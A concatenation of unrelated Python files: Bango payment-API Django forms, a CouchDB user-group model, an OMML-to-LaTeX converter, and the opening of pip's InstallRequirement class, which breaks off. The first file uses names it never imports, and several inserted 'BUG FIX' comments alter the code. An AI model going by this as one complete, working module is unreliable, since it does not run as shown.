from lxml import etree
from lib.bango.constants import (COUNTRIES, CURRENCIES, INVALID_PERSON, OK,
RATINGS, RATINGS_SCHEME,
VAT_NUMBER_DOES_NOT_EXIST)
from lib.bango.utils import verify_sig
from lib.sellers.models import SellerProductBango
from lib.transactions.constants import (SOURCE_BANGO, STATUS_COMPLETED,
TYPE_PAYMENT, TYPE_REFUND)
from lib.transactions.forms import check_status
from lib.transactions.models import Transaction
from solitude.fields import ListField, URLField
from solitude.logger import getLogger
# Module-level logger for the Bango form handling.
log = getLogger('s.bango')
class ProductForm(forms.ModelForm):
    """ModelForm backing creation of a SellerProductBango record."""

    # URLFields resolve resource URIs into the corresponding objects.
    seller_bango = URLField(to='lib.bango.resources.package.PackageResource')
    seller_product = URLField(to='lib.sellers.resources.SellerProductResource')
    name = forms.CharField()
    packageId = forms.IntegerField()

    class Meta:
        model = SellerProductBango
        fields = ('seller_bango', 'seller_product', 'name', 'packageId')
class PackageForm(forms.Form):
    """Collects the merchant details needed to create a Bango package."""

    adminEmailAddress = forms.CharField()
    supportEmailAddress = forms.CharField()
    financeEmailAddress = forms.CharField()
    paypalEmailAddress = forms.CharField()
    vendorName = forms.CharField()
    companyName = forms.CharField()
    address1 = forms.CharField()
    address2 = forms.CharField(required=False)
    addressCity = forms.CharField()
    addressState = forms.CharField()
    addressZipCode = forms.CharField()
    addressPhone = forms.CharField()
    addressFax = forms.CharField(required=False)
    vatNumber = forms.CharField(required=False)
    countryIso = forms.CharField()
    currencyIso = forms.CharField()
    homePageURL = forms.CharField(required=False)
    eventNotificationURL = forms.CharField(required=False)
    # Solitude-only field; stripped from the data sent to Bango.
    seller = URLField(to='lib.sellers.resources.SellerResource')

    @property
    def bango_data(self):
        """The cleaned form data without the solitude-only `seller` key."""
        data = self.cleaned_data.copy()
        data.pop('seller')
        return data
class SupportEmailForm(forms.Form):
    """Updates the support email address on a Bango package."""

    supportEmailAddress = forms.CharField()

    @property
    def bango_data(self):
        """Payload for the call, keyed the way Bango expects."""
        address = self.cleaned_data.get('supportEmailAddress')
        return {'emailAddress': address}

    @property
    def bango_meta(self):
        """Metadata describing the Bango API call for this form."""
        return {'raise_on': (INVALID_PERSON,),
                'to_field': 'support_person_id',
                'from_field': 'personId',
                'method': 'UpdateSupportEmailAddress'}
class FinanceEmailForm(forms.Form):
    """Updates the finance email address on a Bango package."""

    financeEmailAddress = forms.CharField()

    @property
    def bango_meta(self):
        """Metadata describing the Bango API call for this form."""
        return {'raise_on': (INVALID_PERSON,),
                'to_field': 'finance_person_id',
                'from_field': 'personId',
                'method': 'UpdateFinanceEmailAddress'}

    @property
    def bango_data(self):
        """Payload for the call, keyed the way Bango expects."""
        address = self.cleaned_data.get('financeEmailAddress')
        return {'emailAddress': address}
class VatNumberForm(forms.Form):
    """Sets, or deletes, the VAT number on a Bango package.

    Submitting an empty value is interpreted as a request to delete the
    existing VAT number.
    """

    vatNumber = forms.CharField(required=False)
    # Flipped to True during cleaning when an empty value was submitted.
    _is_delete = False

    def clean_vatNumber(self):
        data = self.cleaned_data.get('vatNumber', '')
        if not data:
            # Empty submission: switch this form into delete mode.
            self._is_delete = True
        return data

    @property
    def bango_data(self):
        """Payload for the Bango call; empty when deleting."""
        if self._is_delete:
            return {}
        return self.cleaned_data.copy()

    @property
    def bango_meta(self):
        """Metadata describing the Bango API call for this form."""
        if not self._is_delete:
            return {'method': 'SetVATNumber'}
        return {'raise_on': (VAT_NUMBER_DOES_NOT_EXIST,),
                'method': 'DeleteVATNumber'}
class UpdateAddressForm(forms.Form):
    """Updates the registered address details of a Bango package."""

    vendorName = forms.CharField()
    address1 = forms.CharField()
    address2 = forms.CharField(required=False)
    addressCity = forms.CharField()
    addressState = forms.CharField()
    addressZipCode = forms.CharField()
    addressPhone = forms.CharField()
    addressFax = forms.CharField(required=False)
    # Note the docs are wrong, its not AddressCountryIso.
    countryIso = forms.CharField()
    homePageURL = forms.CharField(required=False)

    @property
    def bango_data(self):
        """A copy of the cleaned data; it maps 1:1 onto the Bango call."""
        return dict(self.cleaned_data)

    @property
    def bango_meta(self):
        """Metadata describing the Bango API call for this form."""
        return {'method': 'UpdateAddressDetails'}
class CreateBangoNumberForm(forms.Form):
    """Creates a Bango number for a seller's product."""

    seller_bango = URLField(to='lib.bango.resources.package.PackageResource')
    seller_product = URLField(to='lib.sellers.resources.SellerProductResource')
    name = forms.CharField(max_length=100)
    # TODO: Expand this bug 814492.
    categoryId = forms.IntegerField()

    @property
    def bango_data(self):
        """The cleaned data reshaped for the Bango call."""
        data = self.cleaned_data.copy()
        # Always sent as a constant 1.
        data['applicationSize'] = 1
        data['packageId'] = data.pop('seller_bango').package_id
        data.pop('seller_product')
        return data
class SellerProductForm(forms.Form):
    """Base class for forms that act on a seller_product_bango resource."""

    seller_product_bango = URLField(
        to='lib.bango.resources.package.BangoProductResource')

    @property
    def bango_data(self):
        """The cleaned data with the resource swapped for its bango id."""
        data = self.cleaned_data.copy()
        data['bango'] = data.pop('seller_product_bango').bango_id
        return data

    def clean_seller_product_bango(self):
        resource = self.cleaned_data['seller_product_bango']
        if not resource.bango_id:
            raise forms.ValidationError('Empty bango_id for: %s' % resource.pk)
        return resource
class MakePremiumForm(SellerProductForm):
    """Sets a price (amount in a supported currency) on a Bango product."""

    currencyIso = forms.ChoiceField(choices=([r, r] for r
                                             in CURRENCIES.keys()))
    price = forms.DecimalField()
class UpdateRatingForm(SellerProductForm):
    """Sets a content rating (scheme + rating) on a Bango product."""

    ratingScheme = forms.ChoiceField(choices=([r, r] for r in RATINGS_SCHEME))
    rating = forms.ChoiceField(choices=([r, r] for r in RATINGS))
class CreateBillingConfigurationForm(SellerProductForm):
    """Creates a Bango billing configuration for a transaction."""

    pageTitle = forms.CharField()
    prices = ListField()
    redirect_url_onerror = forms.URLField()
    redirect_url_onsuccess = forms.URLField()
    transaction_uuid = forms.CharField()
    icon_url = forms.URLField(required=False)

    @property
    def bango_data(self):
        """The cleaned data reshaped for the Bango call."""
        data = super(CreateBillingConfigurationForm, self).bango_data
        # Bango knows our transaction uuid as the external transaction id.
        data['externalTransactionId'] = data.pop('transaction_uuid')
        del data['prices']
        return data

    def clean_prices(self):
        # Remarkably like a formset, but without the drama.
        results = []
        for price in self.cleaned_data.get('prices', []):
            form = PriceForm(price)
            try:
                if not form.is_valid():
                    raise forms.ValidationError(form.errors)
            except AttributeError:
                # A non-dict entry means the submitted JSON was malformed.
                raise forms.ValidationError('Invalid JSON.')
            results.append(form)
        if not results:
            raise forms.ValidationError(
                self.fields['prices'].error_messages['required'])
        return results
class PriceForm(forms.Form):
    """A single price entry: an amount in a supported currency."""

    amount = forms.DecimalField()
    currency = forms.ChoiceField(choices=([r, r] for r in CURRENCIES.keys()))
class CreateBankDetailsForm(forms.Form):
    """Registers bank account details against a Bango package.

    Either a domestic account number or an IBAN must be supplied; `clean`
    enforces that at least one of the two is present.
    """

    seller_bango = URLField(to='lib.bango.resources.package.PackageResource')
    bankAccountPayeeName = forms.CharField(max_length=50)
    bankAccountNumber = forms.CharField(max_length=20, required=False)
    bankAccountCode = forms.CharField(max_length=20)
    bankAccountIban = forms.CharField(max_length=34, required=False)
    bankName = forms.CharField(max_length=50)
    bankAddress1 = forms.CharField(max_length=50)
    bankAddress2 = forms.CharField(max_length=50, required=False)
    bankAddressCity = forms.CharField(max_length=50, required=False)
    bankAddressState = forms.CharField(max_length=50, required=False)
    bankAddressZipCode = forms.CharField(max_length=50)
    bankAddressIso = forms.ChoiceField(choices=([r, r] for r in COUNTRIES))

    def clean(self):
        if not (self.cleaned_data.get('bankAccountNumber')
                or self.cleaned_data.get('bankAccountIban')):
            # Fixed: the message previously said 'bankIban', which is not a
            # field on this form, making the error impossible to act on.
            raise forms.ValidationError('Need either bankAccountNumber '
                                        'or bankAccountIban')
        return self.cleaned_data

    @property
    def bango_data(self):
        """The cleaned data reshaped for the Bango call."""
        result = self.cleaned_data.copy()
        result['packageId'] = result['seller_bango'].package_id
        del result['seller_bango']
        return result
class NotificationForm(forms.Form):
    """Validates a payment notification for a transaction we initiated."""

    # This is our own signature of the moz_transaction that we sent to
    # the Billing Config API
    moz_signature = forms.CharField()
    # When passed into the form, this must be a valid transaction_uuid.
    moz_transaction = forms.CharField()
    # This is the Bango billing config ID we created with the API.
    billing_config_id = forms.CharField()
    # These parameters arrive in the query string.
    bango_response_code = forms.CharField()
    bango_response_message = forms.CharField()
    bango_trans_id = forms.CharField()
    # Store the actual price paid.
    amount = forms.DecimalField(required=False)
    currency = forms.CharField(required=False)

    def clean(self):
        """Verifies moz_signature against the transaction's uuid.

        Raises:
            ValidationError: if the signature does not verify.
        """
        cleaned_data = super(NotificationForm, self).clean()
        # By this point clean_moz_transaction has replaced the uuid string
        # with the Transaction instance itself (hence trans.uuid below).
        trans = cleaned_data.get('moz_transaction')
        sig = cleaned_data.get('moz_signature')
        if trans and sig:
            # Both fields were non-empty so check the signature.
            if not verify_sig(sig, trans.uuid):
                log.info('Signature failed: %s'
                         % cleaned_data.get('billing_config_id'))
                raise forms.ValidationError(
                    'Signature did not match: %s for %s'
                    % (sig, trans.uuid))
        return cleaned_data

    def clean_moz_transaction(self):
        """Resolves the uuid into a pending, unexpired Transaction.

        Returns:
            Transaction. The instance, not the uuid string.

        Raises:
            ValidationError: if the transaction is missing, already
                completed, or older than settings.TRANSACTION_EXPIRY seconds.
        """
        uuid = self.cleaned_data['moz_transaction']
        billing_id = self.cleaned_data.get('billing_config_id')
        try:
            trans = Transaction.objects.get(uuid=uuid)
        except Transaction.DoesNotExist:
            log.info('Transaction not found: %s' % billing_id)
            raise forms.ValidationError('Transaction not found: %s' % uuid)
        if trans.status == STATUS_COMPLETED:
            raise forms.ValidationError('Transaction completed: %s' % uuid)
        if trans.created < (datetime.now() -
                            timedelta(seconds=settings.TRANSACTION_EXPIRY)):
            log.info('Transaction: %s' % billing_id)
            raise forms.ValidationError('Transaction expired: %s' % uuid)
        return trans
class EventForm(forms.Form):
    """Parses and validates a Bango event notification (an XML payload)."""

    notification = forms.CharField(required=True)

    def clean_notification(self):
        """Validates the XML payload and the implied status transition.

        Returns:
            dict. The parsed <data> child elements plus a 'new_status' key.
            Side effect: stashes the affected Transaction in
            self.cleaned_data['transaction'].
        """
        try:
            data = etree.fromstring(self.cleaned_data['notification'])
        except etree.XMLSyntaxError:
            log.error('XML parse error')
            raise forms.ValidationError('XML parse error')
        action = data.find('action')
        if action is None:  # bool(action) is False, so check against None.
            raise forms.ValidationError('Action is required')
        if action.text != 'PAYMENT':
            raise forms.ValidationError('Action invalid: {0}'
                                        .format(action.text))
        if data.find('data') is None:
            raise forms.ValidationError('Data is required')
        # Easier to work with a dictionary than etree.
        data = dict([c.values() for c in data.find('data').getchildren()])
        if data.get('status') != OK:
            # Cannot find any other definitions of what state might be.
            raise forms.ValidationError('Unspecified state: {0}'
                                        .format(data.get('status')))
        try:
            trans = Transaction.objects.get(uid_pay=data['transId'])
        except Transaction.DoesNotExist:
            raise forms.ValidationError('Transaction not found: {0}'
                                        .format(data['transId']))
        data['new_status'] = {OK: STATUS_COMPLETED}[data['status']]
        old = {'status': trans.status, 'created': trans.created}
        new = {'status': data['new_status']}
        try:
            check_status(old, new)
        except forms.ValidationError:
            log.warning('Invalid status change to: {0} for transaction: {1}'
                        .format(data['new_status'], trans.pk))
            raise
        # Instead of having to get the Transaction again save it.
        self.cleaned_data['transaction'] = trans
        return data
class SBIForm(forms.Form):
    """Resolves a seller's Bango package for SBI API calls."""

    seller_bango = URLField(to='lib.bango.resources.package.PackageResource')

    @property
    def bango_data(self):
        """Cleaned data with 'seller_bango' swapped for its 'packageId'."""
        data = self.cleaned_data.copy()
        data['packageId'] = data['seller_bango'].package_id
        del data['seller_bango']
        return data
class RefundForm(forms.Form):
    """Checks that a transaction uuid refers to a refundable Bango payment."""

    uuid = forms.CharField()

    def clean_uuid(self):
        """Return the Transaction if it is a completed, unrefunded payment."""
        trans = get_object_or_404(Transaction,
                                  uuid=self.cleaned_data['uuid'])
        # Each branch raises, so a flat guard chain is equivalent to elif.
        if trans.provider != SOURCE_BANGO:
            raise forms.ValidationError('Not a Bango transaction')
        if trans.status != STATUS_COMPLETED:
            raise forms.ValidationError('Not completed')
        if trans.type != TYPE_PAYMENT:
            raise forms.ValidationError('Not a payment')
        if trans.is_refunded():
            raise forms.ValidationError('Already refunded')
        return trans
class RefundStatusForm(forms.Form):
    """Looks up a refund transaction by uuid for status checks."""

    uuid = forms.CharField()

    def clean_uuid(self):
        # Rather than just returning a 404, let's help the caller of this API
        # tell them why their transaction is denied.
        trans = Transaction.objects.get(uuid=self.cleaned_data['uuid'])
        if trans.type != TYPE_REFUND:
            raise forms.ValidationError('Not a refund')
        return trans
| |
from __future__ import absolute_import
from couchdbkit.ext.django.schema import *
from dimagi.utils.decorators.memoized import memoized
from corehq.apps.users.models import CouchUser, CommCareUser
from dimagi.utils.couch.undo import UndoableDocument, DeleteDocRecord
from django.conf import settings
class Group(UndoableDocument):
    """
    The main use case for these 'groups' of users is currently
    so that we can break down reports by arbitrary regions.

    (Things like who sees what reports are determined by permissions.)
    """
    domain = StringProperty()
    name = StringProperty()
    # a list of user ids for users
    users = ListProperty()
    # ancestor group ids, ending with this group's own id (see add_to_group)
    path = ListProperty()
    case_sharing = BooleanProperty()
    reporting = BooleanProperty(default=True)

    # custom data can live here
    metadata = DictProperty()

    def add_user(self, couch_user_id, save=True):
        """Add a user (id string or CouchUser-like object); no-op if present."""
        if not isinstance(couch_user_id, basestring):
            couch_user_id = couch_user_id.user_id
        if couch_user_id not in self.users:
            self.users.append(couch_user_id)
            if save:
                self.save()

    def remove_user(self, couch_user_id, save=True):
        """Remove a user (id string or CouchUser-like object); no-op if absent."""
        if not isinstance(couch_user_id, basestring):
            couch_user_id = couch_user_id.user_id
        if couch_user_id in self.users:
            # list.remove drops the first occurrence, replacing the old
            # manual index-scan-and-delete loop.
            self.users.remove(couch_user_id)
            if save:
                self.save()

    def add_group(self, group):
        group.add_to_group(self)

    def add_to_group(self, group):
        """
        food = Food(path=[food_id])
        fruit = Fruit(path=[fruit_id])

        If fruit.add_to_group(food._id):
        then update fruit.path to be [food_id, fruit_id]
        """
        group_id = group._id
        if group_id in self.path:
            raise Exception("Group %s is already a member of %s" % (
                self.get_id,
                group_id,
            ))
        new_path = [group_id]
        new_path.extend(self.path)
        self.path = new_path
        self.save()

    def remove_group(self, group):
        group.remove_from_group(self)

    def remove_from_group(self, group):
        """
        food = Food(path=[food_id])
        fruit = Fruit(path=[food_id, fruit_id])

        If fruit.remove_from_group(food._id):
        then update fruit.path to be [fruit_id]
        """
        group_id = group._id
        if group_id not in self.path:
            raise Exception("Group %s is not a member of %s" % (
                self.get_id,
                group_id
            ))
        # Membership was checked above, so index() cannot raise ValueError.
        index = self.path.index(group_id)
        # BUG FIX: the old code kept self.path[index:], which left group_id
        # (and nothing before it) in the path -- a no-op when group_id was
        # first.  Per the docstring above, the removed group and everything
        # before it must be dropped.
        self.path = self.path[index + 1:]
        self.save()

    def get_user_ids(self, is_active=True):
        return [user.user_id for user in self.get_users(is_active)]

    def get_users(self, is_active=True, only_commcare=False):
        """Return the non-deleted CouchUser objects belonging to this group."""
        users = [CouchUser.get_by_user_id(user_id) for user_id in self.users]
        users = [user for user in users if not user.is_deleted()]
        if only_commcare is True:
            # Compare classes directly (exact match, no subclasses) instead of
            # instantiating a throwaway CommCareUser just to read its class.
            users = [
                user for user in users
                if user.__class__ == CommCareUser
            ]
        if is_active is True:
            return [user for user in users if user.is_active]
        else:
            return users

    @memoized
    def get_static_user_ids(self, is_active=True):
        return [user.user_id for user in self.get_static_users(is_active)]

    @memoized
    def get_static_users(self, is_active=True):
        return self.get_users(is_active)

    @classmethod
    def by_domain(cls, domain):
        return cls.view('groups/by_domain',
            key=domain,
            include_docs=True,
            #stale=settings.COUCH_STALE_QUERY,
        ).all()

    @classmethod
    def ids_by_domain(cls, domain):
        return [r['id'] for r in cls.get_db().view('groups/by_domain',
            key=domain,
            include_docs=False,
        )]

    @classmethod
    def by_name(cls, domain, name, one=True):
        result = cls.view('groups/by_name',
            key=[domain, name],
            include_docs=True,
            #stale=settings.COUCH_STALE_QUERY,
        )
        if one:
            return result.one()
        else:
            return result

    @classmethod
    def by_user(cls, user_or_user_id, wrap=True, include_names=False):
        """Groups containing a user; wrapped docs, id/name dicts, or ids."""
        try:
            user_id = user_or_user_id.user_id
        except AttributeError:
            user_id = user_or_user_id
        results = cls.view('groups/by_user', key=user_id, include_docs=wrap)
        if wrap:
            return results
        if include_names:
            return [dict(group_id=r['id'], name=r['value'][1]) for r in results]
        else:
            return [r['id'] for r in results]

    @classmethod
    def get_case_sharing_groups(cls, domain, wrap=True):
        all_groups = cls.by_domain(domain)
        if wrap:
            return [group for group in all_groups if group.case_sharing]
        else:
            return [group._id for group in all_groups if group.case_sharing]

    @classmethod
    def get_reporting_groups(cls, domain):
        key = ['^Reporting', domain]
        return cls.view('groups/by_name',
            startkey=key,
            endkey=key + [{}],
            include_docs=True,
            #stale=settings.COUCH_STALE_QUERY,
        ).all()

    def create_delete_record(self, *args, **kwargs):
        return DeleteGroupRecord(*args, **kwargs)

    @property
    def display_name(self):
        if self.name:
            return self.name
        else:
            return "[No Name]"

    @classmethod
    def user_in_group(cls, user_id, group_id):
        """True when the view maps user_id to exactly one row for group_id."""
        if not user_id or not group_id:
            return False
        c = cls.get_db().view('groups/by_user',
            key=user_id,
            startkey_docid=group_id,
            endkey_docid=group_id
        ).count()
        if c == 0:
            return False
        elif c == 1:
            return True
        else:
            raise Exception(
                "This should just logically not be possible unless the group "
                "has the user in there twice"
            )

    def is_member_of(self, domain):
        return self.domain == domain

    def __repr__(self):
        return ("Group(domain={self.domain!r}, name={self.name!r}, "
                + "case_sharing={self.case_sharing!r}, users={users!r})"
                ).format(self=self, users=self.get_users())
class DeleteGroupRecord(DeleteDocRecord):
    """Deletion record that can re-fetch the deleted Group document."""

    def get_doc(self):
        doc_id = self.doc_id
        return Group.get(doc_id)
| |
# -*- coding: utf-8 -*-
"""
Office Math Markup Language (OMML)
"""
from dwml import ET,NotSupport
from dwml.utils import PY2
from dwml.latex_dict import (CHARS,CHR,CHR_BO,CHR_DEFAULT,POS,POS_DEFAULT
,SUB,SUP,F,F_DEFAULT,T,FUNC,D,D_DEFAULT,RAD,RAD_DEFAULT,ARR
,LIM_FUNC,LIM_TO,LIM_UPP,M,BRK,BLANK,BACKSLASH,ALN,FUNC_PLACE)
OMML_NS = "{http://schemas.openxmlformats.org/officeDocument/2006/math}"
def load(stream):
    """Parse *stream* and yield an oMath2Latex converter per oMath element."""
    tree = ET.parse(stream)
    for node in tree.findall(OMML_NS + 'oMath'):
        yield oMath2Latex(node)
def load_string(string):
    """Parse an XML *string* and yield an oMath2Latex per oMath element."""
    root = ET.fromstring(string)
    for node in root.findall(OMML_NS + 'oMath'):
        yield oMath2Latex(node)
def escape_latex(strs):
    """Backslash-escape LaTeX special characters in *strs*.

    Characters listed in CHARS are prefixed with BACKSLASH unless the
    previous character already was one (i.e. they are already escaped).
    """
    out = []
    prev = None
    strs = strs.replace(r'\\', '\\')
    for ch in strs:
        if (ch in CHARS) and (prev != BACKSLASH):
            out.append(BACKSLASH + ch)
        else:
            out.append(ch)
        prev = ch
    return BLANK.join(out)
def get_val(key, default=None, store=CHR):
    """Look *key* up in *store* (falling back to the key itself), or
    return *default* when key is None."""
    if key is None:
        return default
    return store.get(key, key) if store else key
class Tag2Method(object):
    """Base class dispatching OMML tag names to do_* handler methods via
    the subclass's ``tag2meth`` mapping."""

    def call_method(self, elm, stag=None):
        """Invoke the handler registered for *elm*'s tag; None if missing."""
        if stag is None:
            stag = elm.tag.replace(OMML_NS, '')
        handler = self.tag2meth.get(stag)
        if handler:
            return handler(self, elm)
        return None

    def process_children_list(self, elm, include=None):
        """
        process children of the elm,return iterable
        """
        # Yields (tag, value, element) triples; children whose handler (and
        # process_unknow fallback) both return None are skipped entirely.
        for child in list(elm):
            if OMML_NS not in child.tag:
                continue
            tag = child.tag.replace(OMML_NS, '')
            if include and (tag not in include):
                continue
            value = self.call_method(child, stag=tag)
            if value is None:
                value = self.process_unknow(child, tag)
                if value is None:
                    continue
            yield (tag, value, child)

    def process_children_dict(self, elm, include=None):
        """
        process children of the elm,return dict
        """
        return {tag: value
                for tag, value, child in self.process_children_list(elm, include)}

    def process_children(self, elm, include=None):
        """
        process children of the elm,return string
        """
        pieces = (value if not isinstance(value, Tag2Method) else str(value)
                  for tag, value, child in self.process_children_list(elm, include))
        return BLANK.join(pieces)

    def process_unknow(self, elm, stag):
        # Fallback hook for tags without a registered handler.
        return None
class Pr(Tag2Method):
    """Common properties (the ``<m:*Pr>`` children) of an OMML element.

    Values collected from the property children are kept in a private
    dict and exposed via attribute access; unknown names yield None.
    """

    text = ''

    __val_tags = ('chr', 'pos', 'begChr', 'endChr', 'type')

    __innerdict = None  # per-instance property store; can't use the __dict__

    def __init__(self, elm):
        self.__innerdict = {}
        self.text = self.process_children(elm)

    def __str__(self):
        return self.text

    def __unicode__(self):
        # BUG FIX: previously called self.__str__(self), passing self twice
        # and raising TypeError whenever unicode() was taken of a Pr.
        return self.__str__()

    def __getattr__(self, name):
        return self.__innerdict.get(name, None)

    def do_brk(self, elm):
        # Line-break property: record it and emit the break token.
        self.__innerdict['brk'] = BRK
        return BRK

    def do_common(self, elm):
        # Store the m:val attribute of simple value-carrying properties.
        stag = elm.tag.replace(OMML_NS, '')
        if stag in self.__val_tags:
            t = elm.get('{0}val'.format(OMML_NS))
            if PY2 and (t is not None):
                t = t if isinstance(t, unicode) else unicode(t, 'utf-8')
            self.__innerdict[stag] = t
        return None

    tag2meth = {
        'brk': do_brk,
        'chr': do_common,
        'pos': do_common,
        'begChr': do_common,
        'endChr': do_common,
        'type': do_common,
    }
class oMath2Latex(Tag2Method):
    """
    Convert oMath element of omml to latex
    """

    _t_dict = T

    # wrapper tags whose children are emitted directly by process_unknow
    __direct_tags = ('box', 'sSub', 'sSup', 'sSubSup', 'num', 'den', 'deg', 'e')

    def __init__(self, element):
        self._latex = self.process_children(element)

    def __str__(self):
        return self.latex

    def __unicode__(self):
        # BUG FIX: previously called self.__str__(self), passing self twice
        # and raising TypeError whenever unicode() was taken of the object.
        return self.__str__()

    def process_unknow(self, elm, stag):
        if stag in self.__direct_tags:
            return self.process_children(elm)
        elif stag[-2:] == 'Pr':
            return Pr(elm)
        else:
            return None

    @property
    def latex(self):
        # On Python 2 callers expect utf-8 bytes rather than unicode.
        return self._latex if not PY2 else self._latex.encode('utf-8')

    def do_acc(self, elm):
        """
        the accent function
        """
        c_dict = self.process_children_dict(elm)
        latex_s = get_val(c_dict['accPr'].chr,
                          default=CHR_DEFAULT.get('ACC_VAL'), store=CHR)
        return latex_s.format(c_dict['e'])

    def do_bar(self, elm):
        """
        the bar function
        """
        c_dict = self.process_children_dict(elm)
        pr = c_dict['barPr']
        latex_s = get_val(pr.pos, default=POS_DEFAULT.get('BAR_VAL'), store=POS)
        return pr.text + latex_s.format(c_dict['e'])

    def do_d(self, elm):
        """
        the delimiter object
        """
        c_dict = self.process_children_dict(elm)
        pr = c_dict['dPr']
        null = D_DEFAULT.get('null')
        s_val = get_val(pr.begChr, default=D_DEFAULT.get('left'), store=T)
        e_val = get_val(pr.endChr, default=D_DEFAULT.get('right'), store=T)
        return pr.text + D.format(
            left=null if not s_val else escape_latex(s_val),
            text=c_dict['e'],
            right=null if not e_val else escape_latex(e_val))

    def do_spre(self, elm):
        """
        the Pre-Sub-Superscript object -- Not support yet
        """
        pass

    def do_sub(self, elm):
        text = self.process_children(elm)
        return SUB.format(text)

    def do_sup(self, elm):
        text = self.process_children(elm)
        return SUP.format(text)

    def do_f(self, elm):
        """
        the fraction object
        """
        c_dict = self.process_children_dict(elm)
        pr = c_dict['fPr']
        latex_s = get_val(pr.type, default=F_DEFAULT, store=F)
        return pr.text + latex_s.format(num=c_dict.get('num'),
                                        den=c_dict.get('den'))

    def do_func(self, elm):
        """
        the Function-Apply object (Examples:sin cos)
        """
        c_dict = self.process_children_dict(elm)
        func_name = c_dict.get('fName')
        return func_name.replace(FUNC_PLACE, c_dict.get('e'))

    def do_fname(self, elm):
        """
        the func name
        """
        latex_chars = []
        for stag, t, e in self.process_children_list(elm):
            if stag == 'r':
                if FUNC.get(t):
                    latex_chars.append(FUNC[t])
                else:
                    raise NotSupport("Not support func %s" % t)
            else:
                latex_chars.append(t)
        t = BLANK.join(latex_chars)
        return t if FUNC_PLACE in t else t + FUNC_PLACE  # do_func will replace this

    def do_groupchr(self, elm):
        """
        the Group-Character object
        """
        c_dict = self.process_children_dict(elm)
        pr = c_dict['groupChrPr']
        latex_s = get_val(pr.chr)
        return pr.text + latex_s.format(c_dict['e'])

    def do_rad(self, elm):
        """
        the radical object
        """
        c_dict = self.process_children_dict(elm)
        text = c_dict.get('e')
        deg_text = c_dict.get('deg')
        if deg_text:
            return RAD.format(deg=deg_text, text=text)
        else:
            return RAD_DEFAULT.format(text=text)

    def do_eqarr(self, elm):
        """
        the Array object
        """
        return ARR.format(text=BRK.join(
            [t for stag, t, e in self.process_children_list(elm, include=('e',))]))

    def do_limlow(self, elm):
        """
        the Lower-Limit object
        """
        t_dict = self.process_children_dict(elm, include=('e', 'lim'))
        latex_s = LIM_FUNC.get(t_dict['e'])
        if not latex_s:
            raise NotSupport("Not support lim %s" % t_dict['e'])
        else:
            return latex_s.format(lim=t_dict.get('lim'))

    def do_limupp(self, elm):
        """
        the Upper-Limit object
        """
        t_dict = self.process_children_dict(elm, include=('e', 'lim'))
        return LIM_UPP.format(lim=t_dict.get('lim'), text=t_dict.get('e'))

    def do_lim(self, elm):
        """
        the lower limit of the limLow object and the upper limit of the limUpp function
        """
        return self.process_children(elm).replace(LIM_TO[0], LIM_TO[1])

    def do_m(self, elm):
        """
        the Matrix object
        """
        rows = []
        for stag, t, e in self.process_children_list(elm):
            # BUG FIX: this compared `stag is 'mPr'` -- an identity test that
            # only matched by CPython string-interning accident; use equality.
            if stag == 'mPr':
                pass
            elif stag == 'mr':
                rows.append(t)
        return M.format(text=BRK.join(rows))

    def do_mr(self, elm):
        """
        a single row of the matrix m
        """
        return ALN.join(
            [t for stag, t, e in self.process_children_list(elm, include=('e',))])

    def do_nary(self, elm):
        """
        the n-ary object
        """
        res = []
        bo = ''
        for stag, t, e in self.process_children_list(elm):
            if stag == 'naryPr':
                bo = get_val(t.chr, store=CHR_BO)
            else:
                res.append(t)
        return bo + BLANK.join(res)

    def do_r(self, elm):
        """
        Get text from 'r' element,And try convert them to latex symbols
        @todo text style support , (sty)
        @todo \text (latex pure text support)
        """
        _str = []
        for s in elm.findtext('./{0}t'.format(OMML_NS)):
            # s = s if isinstance(s,unicode) else unicode(s,'utf-8')
            _str.append(self._t_dict.get(s, s))
        return escape_latex(BLANK.join(_str))

    tag2meth = {
        'acc': do_acc,
        'r': do_r,
        'bar': do_bar,
        'sub': do_sub,
        'sup': do_sup,
        'f': do_f,
        'func': do_func,
        'fName': do_fname,
        'groupChr': do_groupchr,
        'd': do_d,
        'rad': do_rad,
        'eqArr': do_eqarr,
        'limLow': do_limlow,
        'limUpp': do_limupp,
        'lim': do_lim,
        'm': do_m,
        'mr': do_mr,
        'nary': do_nary,
    }
| |
import os
import re
import shutil
import sys
import tempfile
import zipfile
from distutils.util import change_root
from distutils import sysconfig
from email.parser import FeedParser
import pip.wheel
from pip._vendor import pkg_resources, six
from pip._vendor.six.moves import configparser
from pip.compat import urllib, native_str, WINDOWS
from pip.download import is_url, url_to_path, path_to_url, is_archive_file
from pip.exceptions import (
InstallationError, UninstallationError, UnsupportedWheel,
)
from pip.index import Link
from pip.locations import (
bin_py, running_under_virtualenv, PIP_DELETE_MARKER_FILENAME, bin_user,
)
from pip.log import logger
from pip.util import (
display_path, rmtree, ask_path_exists, backup_dir, is_installable_dir,
dist_in_usersite, dist_in_site_packages, egg_link_path, make_path_relative,
call_subprocess, is_prerelease, read_text_file, FakeFile, _make_build_dir,
)
from pip.req.req_uninstall import UninstallPathSet
from pip.vcs import vcs
from pip.wheel import move_wheel_files, Wheel, wheel_ext
class InstallRequirement(object):
    def __init__(self, req, comes_from, source_dir=None, editable=False,
                 url=None, as_egg=False, update=True, prereleases=None,
                 editable_options=None, pycompile=True):
        """Create a requirement to be installed.

        :param req: requirement string or pkg_resources.Requirement; None
            for an 'unnamed' requirement (e.g. a bare URL or wheel path).
        :param comes_from: the parent requirement/file that produced this one.
        :param source_dir: directory holding the unpacked source, if known.
        :param editable: True for '-e' style (develop-mode) installs.
        :param url: download/VCS URL for the requirement, if any.
        :param as_egg: install with --egg semantics.
        :param update: whether an editable checkout should be refreshed.
        :param prereleases: explicitly allow pre-release versions; when falsy,
            inferred from the requirement's own specifiers (see below).
        :param editable_options: dict of extra '-e' options (e.g. subdirectory).
        :param pycompile: byte-compile installed files.
        """
        self.extras = ()
        if isinstance(req, six.string_types):
            req = pkg_resources.Requirement.parse(req)
            self.extras = req.extras
        self.req = req
        self.comes_from = comes_from
        self.source_dir = source_dir
        self.editable = editable
        if editable_options is None:
            editable_options = {}
        self.editable_options = editable_options
        self.url = url
        self.as_egg = as_egg
        # Cached location of the .egg-info dir (found lazily by egg_info_path)
        self._egg_info_path = None
        # This holds the pkg_resources.Distribution object if this requirement
        # is already available:
        self.satisfied_by = None
        # This holds the pkg_resources.Distribution object if this requirement
        # conflicts with another installed distribution:
        self.conflicts_with = None
        self._temp_build_dir = None
        # True if the editable should be updated:
        self.update = update
        # Set to True after successful installation
        self.install_succeeded = None
        # UninstallPathSet of uninstalled distribution (for possible rollback)
        self.uninstalled = None
